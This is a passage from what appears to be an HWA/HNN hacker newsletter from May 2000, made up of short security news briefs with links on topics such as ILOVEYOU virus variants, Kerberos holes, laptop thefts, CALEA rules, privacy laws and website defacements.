      
      contributed by root66 
      A senior Department of Justice official has said that the access
      control device law will not apply in the ILOVEYOU virus/worm case.
      This severely hampers the investigation and it is unknown what
      direction it will take next. (If no crime has been committed then why
      are they wasting resources looking for the perpetrator?)
      
      Associated Press - via Yahoo
      
      http://dailynews.yahoo.com/h/ap/20000517/tc/computer_love_bug_76.html
      @HWA
      
 49.0 [HNN] May 18'00 Multiple Holes Found in Kerberos 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      The Computer Emergency Response Team at Carnegie Mellon has issued an
      advisory warning users of several buffer overflow conditions that
      exist in the Kerberos authentication system. These holes could allow
      an intruder root access to a system and affect both versions 4 and 5.
      
      CERT
      
      http://www.cert.org/advisories/CA-2000-06.html
      @HWA
      
      
 50.0 [HNN] May 18'00 Interview with OpenBSD Creator 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      An interview with the creator of OpenBSD, the only operating system
      that is constantly scoured for security flaws, has been posted to Upside.
      Theo de Raadt, the open source project's leader, has some interesting
      things to say about his project and the world around him.
      
      Upside
      Open BSD
      
      http://www.upside.com/Open_Season/3921a9080.html
      http://www.openbsd.org
      @HWA
      
 51.0 [HNN] May 18'00 RIAA Looking For Targets 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Troy 
      The RIAA has filed a lawsuit against SuperPimp Software, a small
      shareware developer of news reading software. No, they aren't
      infringing on copyrights themselves, they just happen to produce
      software that could potentially be used to infringe on others'
      copyrights. The issue is the
      article attachment decoder which could be used to decode copyrighted
      mp3s found in news groups. (Glad someone is fighting them.)
      
      Super Pimp Software
      
      http://www.superpimp.org
      @HWA
      
 52.0 [HNN] May 18'00 Canadian BB DB Clippings 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Adam 
      
      Yesterday we reported on the massive database Canada keeps on its
      citizens that was recently discovered. Today government officials are
      trying to minimize the damage.
      
      Globe and Mail
      
      "Human Resources Minister Jane Stewart said she saw nothing wrong with
      collecting vast amounts of information on Canadians in centralized
      databanks, noting that it has been done since 1985."
      
      National Post
      
      "Anne McLellan, the Justice Minister, yesterday said her officials
      will review outdated federal privacy legislation after a respected
      watchdog revealed that the government has created a computer database
      that puts the privacy of millions of Canadians at risk."
      
      "Ms. Stewart said the information in the computer database is safe
      because it is "encrypted," but then told the Commons that six
      unidentified HRDC employees have access to unencrypted information in
      the database."
      
      Toronto News
      Ottawa News
      
      http://www.globeandmail.com/gam/National/20000517/UPRIVN.html
      http://www.nationalpost.com/news.asp?f
      http://www.canoe.ca/TorontoNews/ts.ts-05-18-0015.html
      http://www.canoe.ca/OttawaNews/OS.OS-05-17-0008.html
      @HWA
      

 53.0 [HNN] May 19'00 NewLove - Dangerous Variant on the Loose 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by altomo 
      One of the over 40 variants of ILOVEYOU has the potential to be a
      serious threat to computer users. The 'New Love' worm is still sent as
      an attachment that a user must click on but it now deletes all
      files on a hard drive and mapped network drives. In addition it
      randomly alters itself making it polymorphic and harder to defend
      against. The worm was first discovered in Israel and is thought to
      have come from someplace in Europe. So far it has infected only a few
      systems in Europe and California. All of the major anti-virus
      companies have added 'New Love' to their definition files.
      
      Associated Press - via Yahoo
      ZD Net
      ABC
      C|Net
      
      Symantec
      F-Secure
      McAfee
      Sophos
      
      http://dailynews.yahoo.com/h/ap/20000519/tc/new_love_bug_4.html
      http://www.zdnet.com/zdnn/stories/news/0,4586,2572454,00.html
      http://abcnews.go.com/sections/tech/dailynews/virus000519.html
      http://news.cnet.com/news/0-1005-200-1899852.html?tag
      http://www.symantec.com
      http://www.f-secure.com
      http://www.mcafee.com
      http://www.sophos.com
      @HWA
      
      
 54.0 [HNN] May 19'00 Old CIA Head Warns of Spy-Viruses 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by aleph1 
      Former CIA director R. James Woolsey has warned that new threats will
      come in the form of 'instructive' viruses as opposed to destructive.
      Unlike Melissa, ILOVEYOU, CIH, and others this new breed of viruses
      would use covert techniques to gather sensitive data and return it to
      international spies and terrorists.
      
      Security Focus
      
      http://www.securityfocus.com/news/38
      @HWA
      
      
 55.0 [HNN] May 19'00 Fed Slow In Virus Reaction 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      Experts in government information systems told members of the General
      Accounting Office that the government was slow in reacting to
      ILOVEYOU. He said that government agencies were not given enough time
      to respond to the crisis which resulted in substantial damage to
      government systems and information.
      
      Associated Press - via Excite
      
      http://news.excite.com/news/ap/000518/16/love-bug-impact
      @HWA
      
      
 56.0 [HNN] May 19'00 FCC's Attempted Expansion of CALEA In Court 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by JavaJ 
      The U.S. Court of Appeals in Washington is hearing arguments over the
      rules issued last year by the Federal Communication Commission
      detailing how telecommunications companies must comply with the
      Communications Assistance for Law Enforcement Act (CALEA), passed by
      Congress in 1994. The FCC mandated that telephone lines must be
      compatible with surveillance equipment, traceable cell phones with
      post dialing digits (account numbers, voice mail passwords, etc.), and
      tappable packet-mode communications or Internet traffic. The FCC
      mandated that all of this information would be turned over simply for
      the asking with no warrant involved. The Center for Democracy and
      Technology is arguing that the FCC overstepped its bounds and that the
      FCC rules are in fact unconstitutional.
      
      MSNBC - via ZD Net
      Center For Democracy and Technology
      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2570897,00.html?chkpt
      http://www.cdt.org/
      @HWA
      
 57.0 [HNN] May 19'00 Russian Computer Crime on the Rise 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      Vitaly Degterev, first deputy chief of the Interior Ministry's
      department on high-tech crimes was quoted by the ITAR-TASS news agency
      as saying that there was more Russian cyber crime in the first three
      months of 2000 than in all of 1999. From January to March of 2000
      over 200 cases of computer attacks had been reported; in all of 1999
      there were only 80 cases.
      
      Associated Press
      
      http://cnn.com/2000/TECH/computing/05/17/russia.hackers.ap/index.html
      @HWA
      
 58.0 [HNN] May 19'00 J0n Pleads Guilty in Canada 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by root66 
      A teenager from Canada, known online as J0n, has pleaded guilty to
      charges in a Montreal court of defacing a NASA web page and of
      penetrating the systems of several Canadian and foreign institutions
      including Harvard and MIT. Following the surprise plea the judge
      served the maximum sentence of 240 hours of community work plus one
      year's probation, restricted use of a computer, and ordered the
      defendant to deliver a speech at a local high school court on the
      evils of hacking.
      
      NewsBytes - via USA Today
      
      http://www.usatoday.com/life/cyber/nb/nb3.htm
      @HWA
      
 59.0 [HNN] May 19'00 Electronically Attacking a Bank 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Sangfroid 
      Think your local neighborhood bank is safe from cyber attack? Think
      again. David H. Freedman has published a step by step guide of one way
      to break into a bank and siphon off 10 to 100 million bucks. Do you
      work at a bank? Better read this.
      
      Forbes
      
      http://www.forbes.com/asap/00/0403/056.htm
      @HWA
 
 60.0 [HNN] May 22'00 NAI Removes NetBus Pro from Scanner 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Judd 
      NetBus Pro 2.10, a remote administration tool by UltraAccess.net, has
      been removed from the McAfee Virus Scan software by Network
      Associates. NAI's change in attitude toward NetBus Pro 2.10 was not
      the result of back room negotiations, but rather upon the advice of
      McAfee's own legal counsel. Upon learning this, UltraAccess has been
      in communication with several other AV vendors, who also have agreed
      to remove detection of NetBus Pro. Information will be released as it
      develops.
      
      UltraAccess.net
      
      http://www.netbuspro.com
      @HWA
      
      
 61.0 [HNN] May 22'00 Brits Lose Another Laptop 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      A British Intelligence officer had his laptop stolen after he put it
      down at a London railway station. Officials say that the laptop did
      not contain classified information but unconfirmed reports indicate
      that it did have specifications for the next generation of fighter
      aircraft and details of how they can be controlled from the ground.
      This is the second laptop stolen from Paddington Station in as many
      months and follows several other recent thefts.
      
      The Times UK
      
      http://www.the-times.co.uk/news/pages/sti/2000/05/21/stinwenws01039.html
      @HWA
      
      
 62.0 [HNN] May 22'00 State Department Audits Missing Laptops 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      The State Department has discovered that 15 of its 1,913 unclassified
      laptops have been either stolen or misplaced in the last 18 months.
      The survey conducted by the department's Bureau of Diplomatic Security
      found only one missing classified laptop out of 60.
      
      Washington Post
      
      http://washingtonpost.com/wp-dyn/articles/A23562-2000May17.html
      @HWA
      
      
 63.0 [HNN] May 22'00 Researchers Develop New Breed of Security Tool 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      This press release is a little short on the technical details but it
      would appear that researchers at the Department of Energy's Sandia
      National Laboratories have built a Heuristic Distributed Security
      Agent. The agent is supposedly able to match incoming threats against
      its fingerprint database but also learn and distinguish new threats on
      the fly. Researchers say that an initial release to sensitive
      government systems will happen within a year and to the civilian
      market within three years.
      
      EurekAlert
      
      http://www.eurekalert.org/releases/snl-chs051800.html
      @HWA
      
      
 64.0 [HNN] May 22'00 Original ILOVEYOU Author Surfaces in Australia 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by tall.drink 
      The Australian that brought down the Australian Republican Movement's
      telecommunications system has told the media that it may have been
      himself who wrote the original worm upon which the world's latest
      email virus, ILOVEYOU, is based. Valiant wants to make it clear that
      someone else added the malicious payload. (Sorta seems like a
      publicity stunt to promote his company.)
      
      Sydney Morning Herald
      Wired
      
      http://www.smh.com.au/news/0005/22/pageone/pageone15.html
      http://www.wired.com/news/technology/0,1282,36477,00.html
      @HWA
      
 
 65.0 [HNN] May 23'00 Secret Searches Reintroduced to Congress 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by JavaJ 
      The Center for Democracy and Technology has sent out a warning
      regarding several bills currently before Congress that contain
      suspicious wording that could be interpreted to violate the Fourth
      Amendment. The language brings back the 'secret search' provisions of
      the Cyberspace Electronic Security Act that was tossed out after the
      draft was leaked to the press. Now secret searches are being
      reintroduced into several bills as small, little-noticed amendments.
      The time to act is now.
      
      CDT Warning
      Center for Democracy and Technology
      
      http://www.cdt.org
      @HWA
      
      
 66.0 [HNN] May 23'00 FTC Wants Control Over Privacy 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      The Federal Trade Commission has asked Congress for authority to
      regulate how companies use personal information collected on their Web
      sites. After concluding the industry failed to safeguard consumer
      privacy through self-regulation, the commission recommended that
      lawmakers pass legislation to bolster its ability to oversee online
      privacy.
      
      Nando Times
      ZD Net
      
      House Republicans think the FTC's move may be nothing more than
      election year politics.
      
      Nando Times
      
      http://www.nandotimes.com/technology/story/body/0,1634,500207162-500289092-501566171-0,00.html
      http://www.zdnet.com/zdnn/stories/news/0,4586,2574082,00.html
      http://www.nandotimes.com/technology/story/body/0,1634,500206866-500288569-501560300-0,00.html
      @HWA
      
      
 67.0 [HNN] May 23'00 Computer Attackers To get Even Higher Sentences 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      At a conference on critical infrastructure protection Sens. John Kyl,
      R-Ariz., and Dianne Feinstein, D-Calif. announced that they are
      working on a bill to increase the sentences for computer attackers.
      The new bill would double the maximum jail term to ten years for
      convicted computer attackers. The legislation will probably be
      introduced later this week. (Increased jail time only costs the
      taxpayer money and does nothing to prevent other crimes or reform the
      perpetrator.)
      
      Newsbytes
      
      http://www.newsbytes.com/pubNews/00/149449.html
      @HWA
      
      
 68.0 [HNN] May 23'00 Australia Loses Sensitive Laptops 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      Five laptops have turned up missing and are presumed stolen in what
      looks like an inside job at Australia's Parliament House. The laptops
      have been valued at $30,000 ($17,169 U.S.D.) and could allow intruders
      access to the parliamentary network.
      
      Australian IT
      
      http://australianit.com.au/common/storyPage/0,3811,715221%255E442,00.html
      @HWA
      
      
 69.0 [HNN] May 23'00 Hong Kong to Create Cyber Response Team 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      The Deputy Secretary for Information Technology and Broadcasting, Alan
      Siu Yu-bun, has said that an agreement has been reached in principle
      to create a Computer Emergency Response Team. It is hoped that the
      Team will not be a government agency but will instead form as a
      non-profit organization. Funding for the Team will hopefully come from
      the Information and Technology Fund.
      
      Hong Kong Standard
      
      http://online.hkstandard.com/today/default.asp?PageType
      @HWA
      
      
 70.0 [HNN] May 23'00 South Africa Forms CyberCrime Unit 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Roelof 
      Nasser Mohammed, the director of crime services at the South African
      Police Services (SAPS), has announced the creation of the South
      African Cybercrime Unit. Officials are actively searching for recruits
      to the new posts and have not as yet determined its size.
      
      Net Assets
      
      http://www.netassets.co.za/netassets/sitewide/content/direct/1,2275,621905-5858-0,00.html
      @HWA
      

 71.0 [HNN] May 24'00 Info-Con Ratings To Be Used for Cyber Threats 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      The Pentagon has decided to post threat condition assessments when it
      is under an information warfare attack. Info-Cons or "information
      conditions" will be decided by US Space Command which is the home of
      JTF-CND. Reactions to Info-Con warnings could range from rejecting
      e-mails from unknown addresses to shutting down the networks. It is
      hoped that "Information Condition" warning levels will be defined
      within the next few weeks.
      
      ABC News
      
      http://abcnews.go.com/sections/tech/DailyNews/pentagon000523.html
      @HWA
      
      
 72.0 [HNN] May 24'00 Ticketmaster to Sell RootFest Tickets 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by lothos 
      RootFest tickets are now available via all TicketMaster locations,
      including their web site. Tickets can still be purchased during the
      event at the RiverCentre Box Office. RootFest, the Midwest's premier
      computer security event, will be held June 14 - 16 in Minneapolis,
      Minnesota.
      
      TicketMaster
      RootFest
      
      https://ticketing.ticketmaster.com/cgi/purchasePage.asp?event_id
      http://www.rootfest.org
      @HWA
      
      
 73.0 [HNN] May 24'00 Zero-Knowledge Teams With IBM 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Craig 
      Zero-Knowledge Systems and IBM announced yesterday at ISPCON in Orlando
      that they will partner together to offer privacy solutions to ISPs.
      Over the next 12 months, IBM and Zero-Knowledge(r) will install 1,000
      IBM Netfinity 4000R servers running Zero-Knowledge's Freedom software,
      at hundreds of ISPs and telecommunication backbone nodes throughout
      the world to expand the cryptographically assured global privacy
      infrastructure of the Freedom network.
      
      At Internet World in London Zero Knowledge announced an alliance with
      Carrier1 International S.A. to enable private Internet use for
      European citizens by deploying Freedom Network servers at major
      routing points across Europe.
      
      Zero Knowledge
      
      http://www.zeroknowledge.com
      @HWA
      
 74.0 [HNN] May 24'00 The Little Miscreants That Could 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by evenprime
      Mafiaboy and Curador, investigated and discovered by the FBI, or were
      there other people involved? Is the FBI really that good as to be able
      to track these teenage troublemakers down?
      
      ZD Net
      
      http://www.zdnet.com/zdnn/stories/comment/0,5859,2573856,00.html
      @HWA
      
 75.0 [HNN] May 24'00 French Say No Anonymity on Web 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      Sponsored by the French Government the Liberty of Communication Act
      would require all web publishers to register with authorities. This
      would essentially eliminate all anonymous web postings. The
      legislation, which has passed the French House and is being debated in
      the Senate this week, would apply to any company that hosts World Wide
      Web pages viewable by the public.
      
      Associated Press - via San Jose Mercury News
      
      http://www.mercurycenter.com/svtech/news/breaking/ap/docs/25664l.htm
      @HWA
      
      
 76.0 [HNN] May 24'00 Experts Stress Education Over Laws 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      During the National Colloquium for Information Systems Security
      Education in Washington, D.C. experts stressed that education,
      research and development programs, are where the solutions to
      cybercrime will come from and not more laws and jail time.
      
      Federal Computer Week
      
      http://www.fcw.com/fcw/articles/2000/0522/web-cyber-05-24-00.asp
      @HWA
 
 77.0 [HNN] May 25'00 NHL Hit with DDoS 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      The National Hockey League was hit with a Distributed Denial of
      Service attack on Sunday which knocked it off line. NHL technicians
      were still trying to filter out the illegitimate requests yesterday.
      The league has said that it has filed a formal complaint with the FBI
      and has asked several security firms to help.
      
      Associated Press - via San Jose Mercury News
      
      http://www.mercurycenter.com/svtech/news/breaking/ap/docs/31233l.htm
      @HWA
      
      
 78.0 [HNN] May 25'00 FCC Rules Under Appeal 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      The US Court of Appeals in Washington is hearing arguments regarding
      rules issued last year by the FCC. The rules spell out how
      telecommunications carriers will need to comply with the
      Communications Assistance for Law Enforcement Act (CALEA). The rules
      require carriers to implement technology to pinpoint cellular phone users
      without a warrant and give the FBI the capability to intercept
      Internet traffic.
      
      ZD Net
      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2570897,00.html?chkpt
      @HWA
      
 79.0 [HNN] May 25'00 Privacy Issue Still Hot In DC 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by root66 
      Sen. Fritz Hollings (D-S.C.) will introduce legislation that will
      require Web sites to conform to the FTC's fair information practices,
      meaning that they would have to provide consumers notice about,
      consent for and access to information collected online, as well as
      ensure security of that data. The Senate Commerce Committee will hold
      a hearing Thursday on the FTC's recommendation that the government
      needs to force web sites to comply with privacy initiatives. The FTC
      has been accused of wanting to regulate the problem as opposed to
      identifying the cause and finding solutions.
      
      Civic.com
      
      http://www.civic.com/civic/articles/2000/0522/web-3ftc-05-24-00.asp
      @HWA
      
      
 80.0 [HNN] May 25'00 Australia Electoral Information Sold For Tax Mailing 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by hool54000 
      Following the revelation two weeks ago that Canada maintains a massive
      database on its citizens it has now been learned that the Australian
      Electoral Commission has sold the information it had (age, address,
      marital status, etc.) to the taxation department. The Australian
      Taxation Office used the information to conduct a mass mailing about
      new taxation laws.
      
      Australian Broadcasting Commission
      News Limited
      
      http://www.abc.net.au/news/2000/05/item20000525004954_1.htm
      http://www.news.com.au/common/story_page/0,4057,726998%255E1702,00.html
      @HWA
      
      
 81.0 [HNN] May 25'00 Cybercops Meet in Boston 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by no0ne 
      Attorneys General from the state of Massachusetts and other law
      enforcement personnel will gather in Waltham MA, for a conference on
      computer crime. Other attendees include Weld Pond from the @stake
      L0pht Labs. The discussion will center around the 'new criminal
      frontier', how to assess a network's vulnerabilities, and what options
      are available for cybercrime victims. The conference will be held from
      1 p.m. to 5:30 p.m. today at the Westin Hotel in Waltham, MA.
      
      Boston Herald
      
      http://www.bostonherald.com/business/technology/hack05242000.htm
      @HWA
      
      
 82.0 [HNN] May 25'00 CERT Releases Advisory on Week Old Issue 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Space Rogue 
      The Computer Emergency Response Team at Carnegie Mellon has issued
      advisory CA-2000-07 regarding Microsoft Office 2000 UA ActiveX
      Control. The advisory was issued yesterday in the late afternoon. The
      @stake L0pht Labs initially released their advisory, demonstration
      code, and patch ten days before.
      
      @stake L0pht Labs
      CERT
      Microsoft
      
      http://www.l0pht.com/advisories/msoua.txt
      http://www.cert.org/advisories/CA-2000-07.html
      http://microsoft.com/technet/security/bulletin/ms00-034.asp      
      @HWA
      
 
 83.0 [HNN] May 26'00 Physical Security Is Real Weak 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      A report issued by the General Accounting Office details how armed
      investigators breached security at several government installations
      using phony IDs and credentials purchased off the Internet. At the
      Pentagon, CIA, Justice Department, FBI, State Department and 14 other
      agencies investigators were able to gain access to the buildings
      without being searched and often times being waved past security
      checkpoints.
      
      Knight Ridder - via The Age
      CNN
      
      http://www.theage.com.au/breaking/0005/25/A17287-2000May25.shtml
      http://www.cnn.com/2000/US/05/24/security.breaches/index.html
      @HWA
      
      
 84.0 [HNN] May 26'00 Reno Does About Face 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by tjadams69 
      "I think any time you expose vulnerabilities it's a good thing," said
      Attorney General Janet Reno. Her comment was directed to investigators
      who posed as false security agents to gain access to supposedly secure
      government buildings. How does 'exposing vulnerabilities' go from good
      in the real world to bad in the cyber world?
      
      CNN
      
      http://www.cnn.com/2000/US/05/25/security.breaches.01/index.html
      @HWA
      
      
 85.0 [HNN] May 26'00 Extortionist Busted 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by no0ne 
      A single charge of using the internet to send extortion threats has
      been filed against Rob Holcomb. Via his e-mails to Audible Inc., a New
      Jersey based company which sells on line books, the 36 year old
      graduate student of Colorado State University claimed to have found a
      way to download the books for free and would not reveal the system's
      weakness except in exchange for money, a car and unlimited free
      download of the company's content. Audible contacted the police who
      traced the alleged perpetrator after he gave the company a mailing
      address and phone number at the school. Holcomb could face up to two
      years in prison and a $100,000 fine.
      
      Associated Press - via Las Vegas Sun
      Internet News
      
      http://www.lasvegassun.com/sunbin/stories/tech/2000/may/25/052500388.html
      http://www.internetnews.com/bus-news/article/0,2171,3_380531,00.html
      @HWA
      
      
 86.0 [HNN] May 26'00 Australian Man Leaks Sewage Via Computer and Radio 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      An alleged computer intruder used radio transmissions to alter sewage
      pump stations causing raw sewage to overflow on Queensland's Sunshine
      Coast. The 49-year-old Brisbane man is expected to face 371 charges
      when he appears in the Maroochydore Magistrates Court on June 15. The
      charges include stealing, computer intrusion and using radio
      communications equipment without authority.
      
      AAP Newsfeed - via Lexis-Nexis
      
      http://web.lexis-nexis.com/more/cahners-chicago/11407/5873217/1
      @HWA
      
      
 87.0 [HNN] May 26'00 2600 Keeps Lawyer 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Macki 
      Judge Kaplan has ruled that the law firm Frankfurt, Garbus, Klein &
      Selz can continue to represent 2600 in their battle against Time
      Warner and the other plaintiffs over the posting of the DeCSS code.
      The plaintiffs had argued that due to the firm's representation of Time
      Warner in other matters it would be a conflict of interest to
      represent 2600. The Judge disagreed.
      
      2600
      
      http://www.2600.org/news/2000/
      @HWA
      
      
 88.0 [HNN] May 26'00 Preliminary Defcon Speaking Schedule 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by DTangent 
      In preparation for Defcon 8 to be held in Las Vegas at the end of July
      organizers have released a preliminary speaking schedule. Organizers
      have also updated the media archives section of the site containing
      film clips, documentaries and other tidbits from Defcons past.
      
      Defcon 8
      
      http://www.defcon.org/
      @HWA
      
      
 89.0 [HNN] May 26'00 Underground Site Form Alliance 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Gh0zT 
      A new alliance has been announced between established computer
      security sites including the Fringe of the Web, and Project Gamma.
      This new alliance hopes to increase the quality of content available
      to its member sites.
      
      Iron Box Technologies
      
      http://www.ironboxtech.com/
      @HWA
      

 90.0 [HNN] May 30'00 Viruses, Viruses, and more Viruses 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse and Weld Pond 
      Computer Associates has warned about a dangerous new virus called
      Cybernet. It spreads by attaching to outgoing e-mail just like the
      Melissa Virus. Cybernet infects Microsoft Word and Excel files. The
      e-mail arrives with a subject line "You've GOT Mail !!!" and the text
      of the message reads: "Please, save the document after you read and
      don't show to anyone else."
      
      Newsbytes
      
      Kak Spreading Fast
      ShoppingPlanet.com accidentally infected 50,000 of its customers when
      it mailed its newsletter out. The newsletter was infected with the Kak
      virus. The company quickly sent out a follow up email warning users
      not to open the previous email. Kak requires no user intervention
      other than opening email. Anti-virus software vendors have included
      the virus in their definition files. Kak only spreads via MS Outlook
      users; Microsoft issued a patch last year to correct the problem.
      
      ZD Net
      
      
 91.0 [HNN] May 30'00 Resume on the Loose
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      A new variant of the old Melissa virus is spreading rapidly. This new
      variant has a much deadlier payload that will delete the contents in
      the system and root directories of Windows and Windows NT. It arrives
      as an attachment with a subject line of 'Resume - Janet Simons'
      
      C|Net
      Tech Web
      MSNBC
      ABC News
      CNN
      Microsoft - Outlook Email Security Update
      Norton
      Symantec
      
      http://www.newsbytes.com/pubNews/00/149635.html
      http://www.zdnet.com/zdnn/stories/news/0,4586,2578234,00.html
      http://news.cnet.com/news/0-1005-200-1960645.html
      http://www.techweb.com/wire/story/TWB20000526S0016
      http://www.msnbc.com/news/412717.asp
      http://abcnews.go.com/sections/tech/DailyNews/virus000527.html
      http://www.cnn.com/2000/TECH/computing/05/27/new.virus.resume/index.html
      http://officeupdate.microsoft.com/2000/articles/Out2ksecarticle.htm
      http://vil.nai.com/villib/dispvirus.asp?virus_k
      http://www.symantec.com/avcenter/venc/data/w97m.melissa.bg.html
      @HWA
      
      
 92.0 [HNN] May 30'00 Gauntlet Firewall Breached 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by no0ne 
      "The world's most secure" firewall was breached during a routine
      security audit by Jim N. Stickley, an employee of Garrison Technologies
      in Austin, TX. The hole, a modified buffer overflow attack, could allow
      an intruder to control the firewall box. Network Associates has issued
      a patch for the problem.
      
      Business Week
      Network Associates
      
      http://www.businessweek.com/bwdaily/dnflash/may2000/nf00526f.htm
      http://www.nai.com/
      @HWA
      
      
 93.0 [HNN] May 30'00 Software Glitch Short Changes Lottery Winners 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      A former employee of GTech Holdings says the U.S. firm knew a computer
      software glitch was short-changing some British lottery winners but
      held off telling the operator, Camelot Group. Britain's independent
      National Lottery Commission (NLC) said last Saturday the defect caused
      computers to think there were more winners than there actually were,
      diluting the prize pool.
      
      Reuters - via San Jose Mercury News
      
      http://www.mercurycenter.com/svtech/news/breaking/reuters/docs/39166l.htm
      @HWA
      
      
 94.0 [HNN] May 30'00 Cyberstalking: Hype or Reality 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Lewis 
      Just how serious is cyberstalking? Some estimates put the number of
      stalkers at 200,000, but no one really knows where that number came
      from. Sure there have been real world victims but does it warrant all
      the hype?
      
      ZD Net
      
      http://www.zdnet.com/intweek/stories/columns/0,4164,2577187,00.html
      @HWA
      
      
 95.0 [HNN] May 30'00 Sexy Geeks and Hackers 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Weld Pond 
      Free software advocates and free love advocates seem to populate
      similar groups, but does membership in one automatically mean you're a
      member of the other?
      
      Salon
      
      http://www.salon.com/tech/feature/2000/05/26/free_love/index.html
      @HWA
      
      
 96.0 [HNN] May 30'00 DC Metro Web Site Defaced 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench
      The Washington DC Metropolitan Transit Authority was defaced yesterday
      by someone who apparently did not appreciate the actions of the rock
      group Metallica. The defaced page contained numerous obscenities and
      criticism of the band's lawsuit against Napster.
      
      Associated Press - via Washington Post
      Attrition.org - mirror of defaced page
      
      http://www.washingtonpost.com/wp-dyn/articles/A26914-2000May29.html
      http://www.attrition.org/mirror/attrition/2000/05/29/www.wmata.com/
      @HWA
      
      
 97.0 [HNN] May 30'00 Mitnick to Challenge Computer Ban 
